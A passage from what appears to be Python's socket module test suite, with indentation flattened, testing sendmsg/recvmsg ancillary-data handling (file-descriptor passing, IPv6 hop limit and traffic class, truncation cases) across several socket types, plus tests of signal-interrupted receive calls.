# BSD seems to set MSG_CTRUNC only
# if an item has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTruncNoBufSize(self):
self.createAndSendFDs(1)
def testCmsgTrunc0(self):
# Check that no ancillary data is received when buffer size is 0.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 0),
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTrunc0(self):
self.createAndSendFDs(1)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
def testCmsgTrunc1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 1))
def _testCmsgTrunc1(self):
self.createAndSendFDs(1)
def testCmsgTrunc2Int(self):
# The cmsghdr structure has at least three members, two of
# which are ints, so we still shouldn't see any ancillary
# data.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
SIZEOF_INT * 2))
def _testCmsgTrunc2Int(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Minus1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(0) - 1))
def _testCmsgTruncLen0Minus1(self):
self.createAndSendFDs(1)
# The following tests try to truncate the control message in the
# middle of the FD array.
def checkTruncatedArray(self, ancbuf, maxdata, mindata=0):
# Check that file descriptor data is truncated to between
# mindata and maxdata bytes when received with buffer size
# ancbuf, and that any complete file descriptor numbers are
# valid.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbuf)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
if mindata == 0 and ancdata == []:
return
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertGreaterEqual(len(cmsg_data), mindata)
self.assertLessEqual(len(cmsg_data), maxdata)
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.checkFDs(fds)
def testCmsgTruncLen0(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0), maxdata=0)
def _testCmsgTruncLen0(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Plus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0) + 1, maxdata=1)
def _testCmsgTruncLen0Plus1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(SIZEOF_INT),
maxdata=SIZEOF_INT)
def _testCmsgTruncLen1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen2Minus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(2 * SIZEOF_INT) - 1,
maxdata=(2 * SIZEOF_INT) - 1)
def _testCmsgTruncLen2Minus1(self):
self.createAndSendFDs(2)
class RFC3542AncillaryTest(SendrecvmsgServerTimeoutBase):
# Test sendmsg() and recvmsg[_into]() using the ancillary data
# features of the RFC 3542 Advanced Sockets API for IPv6.
# Currently we can only handle certain data items (e.g. traffic
# class, hop limit, MTU discovery and fragmentation settings)
# without resorting to unportable means such as the struct module,
# but the tests here are aimed at testing the ancillary data
# handling in sendmsg() and recvmsg() rather than the IPv6 API
# itself.
# Test value to use when setting hop limit of packet
hop_limit = 2
# Test value to use when setting traffic class of packet.
# -1 means "use kernel default".
traffic_class = -1
def ancillaryMapping(self, ancdata):
# Given ancillary data list ancdata, return a mapping from
# pairs (cmsg_level, cmsg_type) to corresponding cmsg_data.
# Check that no (level, type) pair appears more than once.
d = {}
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertNotIn((cmsg_level, cmsg_type), d)
d[(cmsg_level, cmsg_type)] = cmsg_data
return d
def checkHopLimit(self, ancbufsize, maxhop=255, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space. Check that data is MSG, ancillary data is not
# truncated (but ignore any flags in ignoreflags), and hop
# limit is between 0 and maxhop inclusive.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
self.assertIsInstance(ancdata[0], tuple)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimit(self):
# Test receiving the packet hop limit as ancillary data.
self.checkHopLimit(ancbufsize=10240)
@testRecvHopLimit.client_skip
def _testRecvHopLimit(self):
# Need to wait until server has asked to receive ancillary
# data, as implementations are not required to buffer it
# otherwise.
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimitCMSG_SPACE(self):
# Test receiving hop limit, using CMSG_SPACE to calculate buffer size.
self.checkHopLimit(ancbufsize=socket.CMSG_SPACE(SIZEOF_INT))
@testRecvHopLimitCMSG_SPACE.client_skip
def _testRecvHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Could test receiving into buffer sized using CMSG_LEN, but RFC
# 3542 says portable applications must provide space for trailing
# padding. Implementations may set MSG_CTRUNC if there isn't
# enough space for the padding.
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSetHopLimit(self):
# Test setting hop limit on outgoing packet and receiving it
# at the other end.
self.checkHopLimit(ancbufsize=10240, maxhop=self.hop_limit)
@testSetHopLimit.client_skip
def _testSetHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
def checkTrafficClassAndHopLimit(self, ancbufsize, maxhop=255,
ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space. Check that data is MSG, ancillary
# data is not truncated (but ignore any flags in ignoreflags),
# and traffic class and hop limit are in range (hop limit no
# more than maxhop).
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 2)
ancmap = self.ancillaryMapping(ancdata)
tcdata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS)]
self.assertEqual(len(tcdata), SIZEOF_INT)
a = array.array("i")
a.frombytes(tcdata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
hldata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT)]
self.assertEqual(len(hldata), SIZEOF_INT)
a = array.array("i")
a.frombytes(hldata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimit(self):
# Test receiving traffic class and hop limit as ancillary data.
self.checkTrafficClassAndHopLimit(ancbufsize=10240)
@testRecvTrafficClassAndHopLimit.client_skip
def _testRecvTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
# Test receiving traffic class and hop limit, using
# CMSG_SPACE() to calculate buffer size.
self.checkTrafficClassAndHopLimit(
ancbufsize=socket.CMSG_SPACE(SIZEOF_INT) * 2)
@testRecvTrafficClassAndHopLimitCMSG_SPACE.client_skip
def _testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSetTrafficClassAndHopLimit(self):
# Test setting traffic class and hop limit on outgoing packet,
# and receiving them at the other end.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testSetTrafficClassAndHopLimit.client_skip
def _testSetTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testOddCmsgSize(self):
# Try to send ancillary data with first item one byte too
# long. Fall back to sending with correct size if this fails,
# and check that second item was handled correctly.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testOddCmsgSize.client_skip
def _testOddCmsgSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
try:
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class]).tobytes() + b"\x00"),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
except OSError as e:
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
self.assertEqual(nbytes, len(MSG))
# Tests for proper handling of truncated ancillary data
def checkHopLimitTruncatedHeader(self, ancbufsize, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space, which should be too small to contain the ancillary
# data header (if ancbufsize is None, pass no second argument
# to recvmsg()). Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and no ancillary data is
# returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
args = () if ancbufsize is None else (ancbufsize,)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), *args)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no ancillary
# buffer size is provided.
self.checkHopLimitTruncatedHeader(ancbufsize=None,
# BSD seems to set
# MSG_CTRUNC only if an item
# has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
@testCmsgTruncNoBufSize.client_skip
def _testCmsgTruncNoBufSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc0(self):
# Check that no ancillary data is received when ancillary
# buffer size is zero.
self.checkHopLimitTruncatedHeader(ancbufsize=0,
ignoreflags=socket.MSG_CTRUNC)
@testSingleCmsgTrunc0.client_skip
def _testSingleCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=1)
@testSingleCmsgTrunc1.client_skip
def _testSingleCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc2Int(self):
self.checkHopLimitTruncatedHeader(ancbufsize=2 * SIZEOF_INT)
@testSingleCmsgTrunc2Int.client_skip
def _testSingleCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncLen0Minus1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=socket.CMSG_LEN(0) - 1)
@testSingleCmsgTruncLen0Minus1.client_skip
def _testSingleCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncInData(self):
# Test truncation of a control message inside its associated
# data. The message may be returned with its data truncated,
# or not returned at all.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG), socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertLess(len(cmsg_data), SIZEOF_INT)
@testSingleCmsgTruncInData.client_skip
def _testSingleCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
def checkTruncatedSecondHeader(self, ancbufsize, ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space, which should be large enough to
# contain the first item, but too small to contain the header
# of the second. Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and only one ancillary
# data item is returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertIn(cmsg_type, {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT})
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
# Try the above test with various buffer sizes.
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc0(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT),
ignoreflags=socket.MSG_CTRUNC)
@testSecondCmsgTrunc0.client_skip
def _testSecondCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) + 1)
@testSecondCmsgTrunc1.client_skip
def _testSecondCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc2Int(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
2 * SIZEOF_INT)
@testSecondCmsgTrunc2Int.client_skip
def _testSecondCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncLen0Minus1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(0) - 1)
@testSecondCmsgTruncLen0Minus1.client_skip
def _testSecondCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecomdCmsgTruncInData(self):
# Test truncation of the second of two control messages inside
# its associated data.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) + socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
cmsg_types = {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT}
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertLess(len(cmsg_data), SIZEOF_INT)
self.assertEqual(ancdata, [])
@testSecomdCmsgTruncInData.client_skip
def _testSecomdCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Derive concrete test classes for different socket types.
class SendrecvmsgUDPTestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgUDPTest(SendmsgConnectionlessTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoUDPTest(RecvmsgIntoTests, SendrecvmsgUDPTestBase):
pass
class SendrecvmsgUDP6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDP6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgUDP6Test(SendmsgConnectionlessTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgUDP6Test(RecvmsgTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoUDP6Test(RecvmsgIntoTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgRFC3542AncillaryUDP6Test(RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoRFC3542AncillaryUDP6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
class SendrecvmsgTCPTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, TCPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgTCPTest(SendmsgStreamTests, SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgTCPTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoTCPTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
class SendrecvmsgSCTPStreamTestBase(SendrecvmsgSCTPFlagsBase,
SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, SCTPStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgSCTPStreamTest(SendmsgStreamTests, SendrecvmsgSCTPStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgSCTPStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
@requireAttrs(socket.socket, "recvmsg_into")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoSCTPStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgIntoSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
class SendrecvmsgUnixStreamTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, UnixStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "AF_UNIX")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgUnixStreamTest(SendmsgStreamTests, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireAttrs(socket, "AF_UNIX")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgUnixStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@requireAttrs(socket, "AF_UNIX")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoUnixStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgSCMRightsStreamTest(SCMRightsTest, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg_into")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoSCMRightsStreamTest(RecvmsgIntoMixin, SCMRightsTest,
SendrecvmsgUnixStreamTestBase):
pass
# Test interrupting the interruptible send/receive methods with a
# signal when a timeout is set. These tests avoid having multiple
# threads alive during the test so that the OS cannot deliver the
# signal to the wrong one.
class InterruptedTimeoutBase(unittest.TestCase):
# Base class for interrupted send/receive tests. Installs an
# empty handler for SIGALRM and removes it on teardown, along with
# any scheduled alarms.
def setUp(self):
super().setUp()
orig_alrm_handler = signal.signal(signal.SIGALRM,
lambda signum, frame: 1 / 0)
self.addCleanup(signal.signal, signal.SIGALRM, orig_alrm_handler)
self.addCleanup(self.setAlarm, 0)
# Timeout for socket operations
timeout = 4.0
# Provide setAlarm() method to schedule delivery of SIGALRM after
# given number of seconds, or cancel it if zero, and an
# appropriate time value to use. Use setitimer() if available.
if hasattr(signal, "setitimer"):
alarm_time = 0.05
def setAlarm(self, seconds):
signal.setitimer(signal.ITIMER_REAL, seconds)
else:
# Old systems may deliver the alarm up to one second early
alarm_time = 2
def setAlarm(self, seconds):
signal.alarm(seconds)
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedRecvTimeoutTest(InterruptedTimeoutBase, UDPTestBase):
# Test interrupting the recv*() methods with signals when a
# timeout is set.
def setUp(self):
super().setUp()
self.serv.settimeout(self.timeout)
def checkInterruptedRecv(self, func, *args, **kwargs):
# Check that func(*args, **kwargs) raises
# errno of EINTR when interrupted by a signal.
self.setAlarm(self.alarm_time)
with self.assertRaises(ZeroDivisionError) as cm:
func(*args, **kwargs)
def testInterruptedRecvTimeout(self):
self.checkInterruptedRecv(self.serv.recv, 1024)
def testInterruptedRecvIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recv_into, bytearray(1024))
def testInterruptedRecvfromTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom, 1024)
def testInterruptedRecvfromIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom_into, bytearray(1024))
@requireAttrs(socket.socket, "recvmsg")
def testInterruptedRecvmsgTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg, 1024)
@requireAttrs(socket.socket, "recvmsg_into")
def testInterruptedRecvmsgIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg_into, [bytearray(1024)])
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
@unittest.skipUnless(thread, 'Threading required for this test.')
class InterruptedSendTimeoutTest(InterruptedTimeoutBase,
ThreadSafeCleanupTestCase,
SocketListeningTestMixin, TCPTestBase):
# Test interrupting the interruptible send*() methods with signals
# when a timeout is set.
def setUp(self):
super().setUp()
self.serv_conn = self.newSocket()
self.addCleanup(self.serv_conn.close)
# Use a thread to complete the connection, but wait for it to
# terminate before running the test, so that there is only one
# thread to accept the signal.
cli_thread = threading.Thread(target=self.doConnect)
cli_thread.start()
